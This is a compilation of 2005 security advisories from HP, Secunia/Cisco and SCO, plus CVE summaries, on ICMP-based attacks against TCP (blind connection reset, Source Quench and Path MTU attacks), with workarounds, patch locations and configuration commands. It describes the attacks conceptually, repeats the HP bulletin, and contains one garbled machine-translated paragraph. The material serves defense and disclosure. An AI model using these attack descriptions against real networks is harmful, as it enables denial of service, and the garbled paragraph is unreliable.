ip_pmtu_strategy = 0 or 3 as a workaround for the problem of CAN-2005-1192. CAN-2004-1060 has a different root cause and cannot be worked around with p_pmtu_strategy=3. To work around both CAN-2005-1192 and CAN-2004-1060 ip_pmtu_strategy=0 must be used. Please refer to the Manual Actions section below for a summary of the required actions. Workarounds: CAN-2004-0790 and CAN-2004-0791 Filter out the following ICMP messages: Type 3, Code 2 (Destination Unreachable, Protocol Unreachable) Type 3, Code 3 (Destination Unreachable, Port Unreachable) Type 4, Code 0 (Source Quench) CAN-2004-1060 Set ip_pmtu_strategy=0. Note: Filtering "Protocol Unreachable" and "Port Unreachable" should not be done without careful testing. Filtering these out may interfere with the correct functioning of network components. Filtering "Source Quench" should present little risk. Setting ip_pmtu_strategy=0 ================== Edit /etc/rc.config.d/nddconf to add the following: TRANSPORT_NAME[n]=ip NDD_NAME[n]=ip_pmtu_strategy NDD_VALUE[n]=0 where 'n' is the next available index value as described in the nddconf comments. This value will take effect when the system is rebooted. Until the system can be rebooted use the following command to read the /etc/rc.config.d/nddconf file and set the tunable parameters: /usr/bin/ndd -c The ip_pmtu_strategy parameter can be displayed by the following command: /usr/bin/ndd -get /dev/ip ip_pmtu_strategy Note: Since open connections will remain potentially vulnerable until they are closed and certain internal data structures are released it is recommended that the system be rebooted. Note: There is a defect that will cause "ndd -c" to fail if there are more than 10 directives in /etc/rc.config.d/nddconf. That defect is fixed in the following patches: B.11.11 - PHNE_25644 or subsequent B.11.04 - PHNE_26076 or subsequent B.11.00 - PHNE_26125 or subsequent Preliminary binary files ============== ->Preliminary binary files are available for B.11.00 and B.11.22. Patches are available for B.11.11 and B.11.23. The patches and the preliminary binary files address CAN-2004-0790 and CAN-2004-0791 only. Although changes in the patches and binary files for CAN-2004-0790 and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060, they do make it less likely to succeed. Instructions for downloading and installing the binary files are contained in readme files available here: System: hprc.external.hp.com (192.170.19.51) Login: icmp Password: icmp FTP Access: ftp://icmp:icmp@hprc.external.hp.com/ or: ftp://icmp:icmp@192.170.19.51/ Note: The links above may not work for all browsers. If the link fails the url should be entered directly into the browser's address field. Since a patch is available for B.11.11 the readme.11.11.txt and corresponding binary files have been removed from the ftp site. ->Since a patch is available for B.11.23 the readme.11.23.txt and corresponding binary files have been removed from the ftp site. Download the appropriate readme file containing further instructions: readme.11.00.txt readme.11.22.txt Verify the cksum or md5sum: ->Note: The readme files have not changed since rev.1 of this Security Bulletin. cksum readme* 2844254744 2546 readme.11.00.txt 2836317466 2469 readme.11.22.txt md5sum readme* d28504f8532192de6a4f33bba4ea90ec readme.11.00.txt cafbb24f3dc7131501142f75deaeccbd readme.11.22.txt Download and install the binary files as discussed in the readme files. The binary files are available in the same directory as the readme files. For B.11.11 download and install PHNE_33159. The patch is available from < http://itrc.hp.com>. ->For B.11.23 download and install PHNE_32606. The patch is available from < http://itrc.hp.com>. MANUAL ACTIONS: Yes - NonUpdate 1. Set ip_pmtu_strategy=0 2. EITHER a. Filter out the following ICMP messages: Type 3, Code 2 (Destination Unreachable, Protocol Unreachable) Type 3, Code 3 (Destination Unreachable, Port Unreachable) Type 4, Code 0 (Source Quench) OR b. Install the appropriate binary file or patch (binary file not available for B.11.04). BULLETIN REVISION HISTORY: Revision 0: 25 May 2005 Initial release Revision 1: 1 June 2005 Binary files for B.11.00 and B.11.22 are available. Added information about CAN-2004-1060. The "set ip_pmtu_strategy=0" workaround is required even if binary files are installed. Removed IPSec information. Revision 2: 19 June 2005 TOUR (Transport Optional Upgrade Release) on B.11.11 and B.11.23 is potentially vulnerable. Added a description of the sequence number check implemented in the binary files. Revision 3: 27 June 2005 PHNE_33159 is available for B.11.11. The B.11.11 binary files have been removed from the ftp site. Revision 4: 10 July 2005 PHNE_32606 is available for B.11.23. The B.11.23 binary files have been removed from the ftp site. HP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=B6834AA SUPPORT: For further information, contact normal HP Services support channel. REPORT: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com. It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To obtain the security-alert PGP key please send an e-mail message to security-alert@hp.com with the Subject of 'get key' (no quotes). SUBSCRIBE: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA& langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your IRTC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your IRTC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page Subscriber's choice for Business: sign-in. On the Web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." (c)Copyright 2005 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBQtJVE+AfOvwtKn1ZEQKwPwCeLKNxE1048xGZniru4epJ6YAqYIcAn2+Y fjKXZ3hbnTeQeIn9Kk9ePC1d =cFE+ -----END PGP SIGNATURE----- . HP Tru64 UNIX 5.1B-3 HP Tru64 UNIX 5.1B-2/PK4 HP Tru64 UNIX 5.1A PK HP Tru64 UNIX 4.0G PK4 HP Tru64 UNIX 4.0F PK8 BACKGROUND: Special Instructions for the Customer The Internet Control Message Protocol (ICMP) (RFC 792) is used in the Internet Architecture to perform fault-isolation and recovery (RFC816), which is the group of actions that hosts and routers take to determine if a network failure has occurred. The industry standard TCP specification (RFC 793) has a vulnerability whereby ICMP packets can be used to perform a variety of attacks such as blind connection reset attacks and blind throughput-reduction attacks. Path MTU Discovery (RFC 1191) describes a technique for dynamically discovering the MTU (maximum transmission unit) of an arbitrary internet path. This protocol uses ICMP packets from the router to discover the MTU for a TCP connection path. HP has addressed these potential vulnerabilities by providing a new kernel tunable in Tru64 UNIX V5.1B and 5.1A, icmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two new kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. This behavior protects TCP against spoofed ICMP packets. Set the tunable as follows: icmp_tcpseqcheck=1 (default) Provides a level of protection that reduces the possibility of considering a spoofed ICMP packet as valid to one in two raised to the thirty-second power. icmp_tcpseqcheck=0 Retains existing behavior, i.e., accepts all ICMP packets icmp_rejectcodemask In the Requirements for IP Version 4 Routers (RFC 1812), research suggests that the use of ICMP Source Quench packets is an ineffective (and unfair) antidote for congestion. Thus, HP recommends completely ignoring ICMP Source Quench packets using the icmp_rejectcodemask tunable. The icmp_rejectcodemask is a bitmask that designates the ICMP codes that the system should reject. For example, to reject ICMP Source Quench packets, set the mask bit position for the ICMP_SOURCEQUENCH code 4, which is two to the 4th power = 16 (0x10 hex). The icmp_rejectcodemask tunable can be used to reject any ICMP packet type, or multiple masks can be combined to reject more than one type. Note: the ICMP type codes are defined in "/usr/include/netinet/ip_icmp.h". Set the tunable as follows: icmp_rejectcodemask = 0x10 Rejects ICMP Source Quench packets icmp_rejectcodemask = 0 (default) Retains existing behavior, i.e., accepts all ICMP packets Adjusting the variables The ICMP sequence check variable (icmp_tcpseqcheck) can be adjusted using the sysconfig and sysconfigdb commands: # sysconfig -q inet icmp_tcpseqcheck inet: icmp_tcpseqcheck = 1 # sysconfig -r inet icmp_tcpseqcheck=0 icmp_tcpseqcheck: reconfigured # sysconfig -q inet icmp_tcpseqcheck inet: icmp_tcpseqcheck = 0 # sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge # sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet # sysconfigdb -l inet inet: icmp_tcpseqcheck = 1 Similarly, the icmp_rejectcodemask variable can be adjusted using the sysconfig and sysconfigdb commands: # sysconfig -q inet icmp_rejectcodemask inet: icmp_rejectcodemask = 0 # sysconfig -r inet icmp_rejectcodemask=0x10 icmp_rejectcodemask: reconfigured # sysconfig -q inet icmp_rejectcodemask inet: icmp_rejectcodemask = 16 # sysconfig -q inet icmp_rejectcodemask > /tmp/icmp_rejectcodemask_merge # sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet # sysconfigdb -l inet inet: icmp_rejectcodemask = 16 RESOLUTION: Until the corrections are available in a mainstream release patch kit, HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer. The ERP kits use dupatch to install and will not install over any installed Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the ERP installation is blocked by any of your installed CSPs. The fixes contained in the ERP kits are scheduled to be available in the following mainstream patch kits: HP Tru64 Unix 5.1B-4 Early Release Patches The ERPs deliver the following file: /sys/BINARY/inet.mod HP Tru64 UNIX 5.1B-3 ERP Kit Name: T64KIT0025925-V51BB26-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025925-V51BB26-ES-20050628 MD5 checksum: 129251787a426320af16cd584b982027 HP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name: T64KIT0025924-V51BB25-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025924-V51BB25-ES-20050628 MD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af HP Tru64 UNIX 5.1A PK6 ERP Kit Name: T64KIT0025922-V51AB24-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025922-V51AB24-ES-20050628 MD5 checksum: 7c373b35c95945651a1cfda96bf71421 HP Tru64 UNIX 4.0G PK4 ERP Kit Name: T64KIT0025920-V40GB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 13849fd555239d75d300d1cb46dc995f HP Tru64 UNIX 4.0F PK8 ERP Kit Name: DUXKIT0025921-V40FB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 743b614d39f185802701b7f2dd14ffa5 MD5 checksums are available from the ITRC patch database main page: http://www.itrc.hp.com/service/patch/mainPage.do - From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links. ---------------------------------------------------------------------- Want a new IT Security job? Vacant positions at Secunia: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Cisco Various Products ICMP Message Handling Denial of Service SECUNIA ADVISORY ID: SA14904 VERIFY ADVISORY: http://secunia.com/advisories/14904/ CRITICAL: Less critical IMPACT: DoS WHERE: >From remote OPERATING SYSTEM: Cisco Content Services Switch 11000 Series (WebNS) http://secunia.com/product/1507/ Cisco Global Site Selector (GSS) 4480 1.x http://secunia.com/product/2270/ Cisco IOS 10.x http://secunia.com/product/184/ Cisco IOS 11.x http://secunia.com/product/183/ Cisco IOS 12.x http://secunia.com/product/182/ Cisco IOS R11.x http://secunia.com/product/53/ Cisco IOS R12.x http://secunia.com/product/50/ Cisco IOS XR (CRS-1) 3.x http://secunia.com/product/4907/ Cisco ONS 15000 Series http://secunia.com/product/684/ Cisco PIX 6.x http://secunia.com/product/56/ Cisco SAN-OS 1.x (MDS 9000 Switches) http://secunia.com/product/3214/ DESCRIPTION: Fernando Gont has published an Internet-Draft describing how ICMP (Internet Control Message Protocol) can be exploited by malicious people to cause a DoS (Denial of Service). Cisco has acknowledged that various Cisco products are affected. The published Internet-Draft details three types of attacks, which utilize the following ICMP messages to cause a negative impact on TCP connections either terminating or originating from a vulnerable device. SOLUTION: See patch matrix in vendor advisory for information about fixes. http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml#software PROVIDED AND/OR DISCOVERED BY: Fernando Gont ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml NISCC: http://www.niscc.gov.uk/niscc/docs/al-20050412-00308.html ICMP attacks against TCP: http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html OTHER REFERENCES: RFC1122 (Requirements for Internet Hosts -- Communication Layers): http://www.ietf.org/rfc/rfc1122.txt RFC1191 (Path MTU Discovery): http://www.ietf.org/rfc/rfc1191.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The RFC recommends no security checking for in-bound ICMP messages, so long as a related connection exists, and may potentially allow several different Denials of Service. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0790 to this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0791 to this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-1060 to this issue. Vulnerable Supported Versions System Binaries ---------------------------------------------------------------------- OpenServer 5.0.6 ip and tcp drivers OpenServer 5.0.7 ip and tcp drivers 3. Solution The proper solution is to install the latest packages. OpenServer 5.0.6 4.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4 4.2 Verification MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd md5 is available for download from ftp://ftp.sco.com/pub/security/tools 4.3 Installing Fixed Binaries The following packages should be installed on your system before you install this fix: RS506A OSS646 ERG711746: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3/SCOSA-2005.3.txt ERG712606: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.9/SCOSA-2005.9.txt Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to a directory. 2) Run the custom command, specify an install from media images, and specify the directory as the location of the images. OpenServer 5.0.7 5.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4 5.2 Verification MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd md5 is available for download from ftp://ftp.sco.com/pub/security/tools 5.3 Installing Fixed Binaries The following package should be installed on your system before you install this fix: OSR507MP4 - OpenServer 5, Release 5.0.7 Maintenance Pack 4 Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to a directory. 2) Run the custom command, specify an install from media images, and specify the directory as the location of the images. References Specific references for this advisory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060 SCO security resources: http://www.sco.com/support/security/index.html SCO security advisories via email http://www.sco.com/support/forums/security.html This security fix closes SCO incidents sr892503 fz530662 erg712759. Disclaimer SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products. Acknowledgments The SCO Group would like to thank Fernando Gont for reporting these issues. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) on an active TCP session

Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the "blind connection-reset attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. In multiple vendor products TCP The implementation of ICMP Included in error message IP Address and TCP There is a flaw that only validates the port and does not check that the sequence number is in the proper range. This is illegal ICMP hard error By processing the message, TCP A vulnerability exists in which connections are reset. The vulnerability is ICMP Vulnerabilities resulting from message processing (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) Out of CVE-2004-0790 Vulnerability published as. TCP Due to vulnerabilities that affect implementation, a wide range of products are affected by these vulnerabilities. For more information, NISCC-532967 (JVN) , NISCC Advisory 532967/NISCC/ICMP (CPNI Advisory 00303) Please check also.Fraudulent ICMP By processing error messages TCP Connection is reset, resulting in service disruption (DoS) It can cause a condition. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 HP SECURITY BULLETIN HPSBUX01164 REVISION: 4 SSRT4884 rev.4 - HP-UX TCP/IP Remote Denial of Service (DoS) NOTICE: There are no restrictions for distribution of this Security Bulletin provided that it remains complete and intact. The information in this Security Bulletin should be acted upon as soon as possible. INITIAL RELEASE: 10 July 2005 POTENTIAL SECURITY IMPACT: Remote Denial of Service (DoS) SOURCE: Hewlett-Packard Company HP Software Security Response Team VULNERABILITY SUMMARY: A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). REFERENCES: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP. HP-UX B.11.11 and B.11.23 running TOUR (Transport Optional Upgrade Release). BACKGROUND: AFFECTED VERSIONS HP-UX B.11.22 HP-UX B.11.00 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and either install binary files or filter ICMP HP-UX B.11.11 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and install PHNE_33159 HP-UX B.11.23 ============= Networking.NET2-KRN ->action: set ip_pmtu_strategy= 0 and install PHNE_32606 HP-UX B.11.11 HP-UX B.11.23 ============= TOUR_PRODUCT.T-NET2-KRN action: set ip_pmtu_strategy= 0 and filter ICMP HP-UX B.11.04 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and filter ICMP END AFFECTED VERSIONS Note: The latest TOUR (Transport Optional Upgrade Release), version 2.4, is available on B.11.11 only. The latest Transport Functionality is available to B.11.23 customers in the HP-UX 11i v2 September 2004 release. Customers using TOUR on B.11.23 can apply the workaround (set ip_pmtu_strategy= 0 and filter ICMP) or upgrade to the HP-UX 11i v2 September 2004 release. After upgrading the action for B.11.23 Networking.NET2-KRN listed above should be implemented. <http://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html? lang=en> There are three issues reported in NISCC VU#532967: CVE number: CAN-2004-0790 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790> CVE number: CAN-2004-0791 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791> CVE number: CAN-2004-1060 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060> Workarounds are available for all three of these issues. Until binary files are available for B.11.04 the workarounds should be used. ->Binary files are available for CAN-2004-0790 and CAN-2004-0791 for HP-UX B.11.00 and B.11.22. Since PHNE_33159 is now available for B.11.11 the preliminary binary files for B.11.11 have been removed from the ftp site. ->Since PHNE_32606 is now available for B.11.23 the preliminary binary files for B.11.23 have been removed from the ftp site. Note: If the TOUR (Transport Optional Upgrade Release) product is installed the binary files cannot be used. Until the TOUR product is revised there are several options: B.11.11 1. Use the workarounds. or 2. Remove TOUR and install the binary files. B.11.23 1. Use the workarounds. or 2. Upgrade to the HP-UX 11i v2 September 2004 release and install the binary files. TOUR(Transport Optional Upgrade Release) is available from <http://www.hp.com/go/softwaredepot>. Workaround for CAN-2004-1060 may not be necessary. =================================== Although changes in the binary files and patches for CAN-2004-0790 and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060, they do make it less likely to succeed. The sequence number check suggested in section 5.1 of <http://www.ietf.org/internet-drafts/ draft-gont-tcpm-icmp-attacks-03.txt> has been implemented. Customers should consider whether this check reduces the risk of the exploit to the point that setting ip_pmtu_strategy=0 is not required. If the workaround for CAN-2004-1060 is to be used, please note the following: ================================================= HPSBUX01137 recommends setting ip_pmtu_strategy = 0 or 3 as a workaround for the problem of CAN-2005-1192. CAN-2004-1060 has a different root cause and cannot be worked around with p_pmtu_strategy=3. To work around both CAN-2005-1192 and CAN-2004-1060 ip_pmtu_strategy=0 must be used. Please refer to the Manual Actions section below for a summary of the required actions. Workarounds: CAN-2004-0790 and CAN-2004-0791 Filter out the following ICMP messages: Type 3, Code 2 (Destination Unreachable, Protocol Unreachable) Type 3, Code 3 (Destination Unreachable, Port Unreachable) Type 4, Code 0 (Source Quench) CAN-2004-1060 Set ip_pmtu_strategy=0. Note: Filtering "Protocol Unreachable" and "Port Unreachable" should not be done without careful testing. Filtering these out may interfere with the correct functioning of network components. Filtering "Source Quench" should present little risk. Setting ip_pmtu_strategy=0 ================== Edit /etc/rc.config.d/nddconf to add the following: TRANSPORT_NAME[n]=ip NDD_NAME[n]=ip_pmtu_strategy NDD_VALUE[n]=0 where 'n' is the next available index value as described in the nddconf comments. This value will take effect when the system is rebooted. Until the system can be rebooted use the following command to read the /etc/rc.config.d/nddconf file and set the tunable parameters: /usr/bin/ndd -c The ip_pmtu_strategy parameter can be displayed by the following command: /usr/bin/ndd -get /dev/ip ip_pmtu_strategy Note: Since open connections will remain potentially vulnerable until they are closed and certain internal data structures are released it is recommended that the system be rebooted. Note: There is a defect that will cause "ndd -c" to fail if there are more than 10 directives in /etc/rc.config.d/nddconf. That defect is fixed in the following patches: B.11.11 - PHNE_25644 or subsequent B.11.04 - PHNE_26076 or subsequent B.11.00 - PHNE_26125 or subsequent Preliminary binary files ============== ->Preliminary binary files are available for B.11.00 and B.11.22. Patches are available for B.11.11 and B.11.23. The patches and the preliminary binary files address CAN-2004-0790 and CAN-2004-0791 only. Although changes in the patches and binary files for CAN-2004-0790 and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060, they do make it less likely to succeed. Instructions for downloading and installing the binary files are contained in readme files available here: System: hprc.external.hp.com (192.170.19.51) Login: icmp Password: icmp FTP Access: ftp://icmp:icmp@hprc.external.hp.com/ or: ftp://icmp:icmp@192.170.19.51/ Note: The links above may not work for all browsers. If the link fails the url should be entered directly into the browser's address field. Since a patch is available for B.11.11 the readme.11.11.txt and corresponding binary files have been removed from the ftp site. ->Since a patch is available for B.11.23 the readme.11.23.txt and corresponding binary files have been removed from the ftp site. Download the appropriate readme file containing further instructions: readme.11.00.txt readme.11.22.txt Verify the cksum or md5sum: ->Note: The readme files have not changed since rev.1 of this Security Bulletin. cksum readme* 2844254744 2546 readme.11.00.txt 2836317466 2469 readme.11.22.txt md5sum readme* d28504f8532192de6a4f33bba4ea90ec readme.11.00.txt cafbb24f3dc7131501142f75deaeccbd readme.11.22.txt Download and install the binary files as discussed in the readme files. The binary files are available in the same directory as the readme files. For B.11.11 download and install PHNE_33159. The patch is available from < http://itrc.hp.com>. ->For B.11.23 download and install PHNE_32606. The patch is available from < http://itrc.hp.com>. MANUAL ACTIONS: Yes - NonUpdate 1. Set ip_pmtu_strategy=0 2. EITHER a. Filter out the following ICMP messages: Type 3, Code 2 (Destination Unreachable, Protocol Unreachable) Type 3, Code 3 (Destination Unreachable, Port Unreachable) Type 4, Code 0 (Source Quench) OR b. Install the appropriate binary file or patch (binary file not available for B.11.04). BULLETIN REVISION HISTORY: Revision 0: 25 May 2005 Initial release Revision 1: 1 June 2005 Binary files for B.11.00 and B.11.22 are available. Added information about CAN-2004-1060. The "set ip_pmtu_strategy=0" workaround is required even if binary files are installed. Removed IPSec information. Revision 2: 19 June 2005 TOUR (Transport Optional Upgrade Release) on B.11.11 and B.11.23 is potentially vulnerable. Added a description of the sequence number check implemented in the binary files. Revision 3: 27 June 2005 PHNE_33159 is available for B.11.11. The B.11.11 binary files have been removed from the ftp site. Revision 4: 10 July 2005 PHNE_32606 is available for B.11.23. The B.11.23 binary files have been removed from the ftp site. HP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=B6834AA SUPPORT: For further information, contact normal HP Services support channel. REPORT: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com. It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To obtain the security-alert PGP key please send an e-mail message to security-alert@hp.com with the Subject of 'get key' (no quotes). SUBSCRIBE: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA& langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your IRTC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your IRTC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page Subscriber's choice for Business: sign-in. On the Web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." (c)Copyright 2005 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBQtJVE+AfOvwtKn1ZEQKwPwCeLKNxE1048xGZniru4epJ6YAqYIcAn2+Y 